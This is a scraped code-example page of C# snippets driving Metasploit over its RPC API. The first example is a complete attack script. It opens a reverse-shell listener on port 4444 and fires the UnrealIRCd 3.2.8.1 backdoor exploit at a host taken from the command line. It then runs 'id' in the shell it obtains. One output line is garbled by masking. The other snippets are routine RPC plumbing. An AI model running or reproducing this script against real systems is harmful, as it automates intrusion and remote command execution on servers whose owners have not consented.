Ejemplo n.º 1
0
        static void Main1(string[] args)
        {
            string listenAddr = args[1];
            int    listenPort = 4444;
            string payload    = "cmd/unix/reverse";

            using (MetasploitSession session = new MetasploitSession("username", "password", "http://" + listenAddr + ":55553/api"))
            {
                if (string.IsNullOrEmpty(session.Token))
                {
                    throw new Exception("Login Failed. Check credentials");
                }

                using (MetasploitManager manager = new MetasploitManager(session))
                {
                    Dictionary <object, object> response = null;

                    Dictionary <object, object> opts = new Dictionary <object, object>();
                    opts["ExitOnSession"] = false;
                    opts["PAYLOAD"]       = payload;
                    opts["LHOST"]         = listenAddr;
                    opts["LPORT"]         = listenPort;

                    response = manager.ExecuteModule("exploit", "multi/handler", opts);
                    object jobID = response["job_id"];

                    // Vuln Exploit
                    opts          = new Dictionary <object, object>();
                    opts["RHOST"] = args[0];
                    opts["DisablePayloadHandler"] = true;
                    opts["LHOST"]   = listenAddr;
                    opts["LPORT"]   = listenPort;
                    opts["PAYLOAD"] = payload;

                    manager.ExecuteModule("exploit", "unix/irc/unreal_ircd_3281_backdoor", opts);

                    response = manager.ListJobs();
                    while (response.ContainsValue("Exploit: unix/irc/unreal_ircd_3281_backdoor"))
                    {
                        Console.WriteLine("Waiting");
                        System.Threading.Thread.Sleep(10000);
                        response = manager.ListJobs();
                    }

                    response = manager.StopJob(jobID.ToString());

                    response = manager.ListSessions();
                    foreach (var pair in response)
                    {
                        string sessionID = pair.Key.ToString();
                        manager.WriteToSessionShell(sessionID, "id\n");
                        System.Threading.Thread.Sleep(1000);
                        response = manager.ReadSessionShell(sessionID);
                        Console.WriteLine("We are user: "******"data"]);
                        Console.WriteLine("Killing session: " + sessionID);
                        manager.StopSession(sessionID);
                    }
                }
            }
        }
Ejemplo n.º 2
0
        static void Main(string[] args)
        {
            // Testing MetasploitSession Class from RPC socket
            string listenAddr = args[0];

            using (MetasploitSession session = new MetasploitSession("username", "password", "http://" + listenAddr + ":55553/api"))
            {
                if (string.IsNullOrEmpty(session.Token))
                {
                    throw new Exception("Login Failed. Check credentials");
                }

                Dictionary <object, object> version = session.Execute("core.version");

                Console.WriteLine("Version: " + version["version"]);
                Console.WriteLine("Ruby: " + version["ruby"]);
                Console.WriteLine("API: " + version["api"]);
            }
        }
Ejemplo n.º 3
0
 public void Dispose()
 {
     _session = null;
 }
Ejemplo n.º 4
0
 public MetasploitManager(MetasploitSession session)
 {
     _session = session;
 }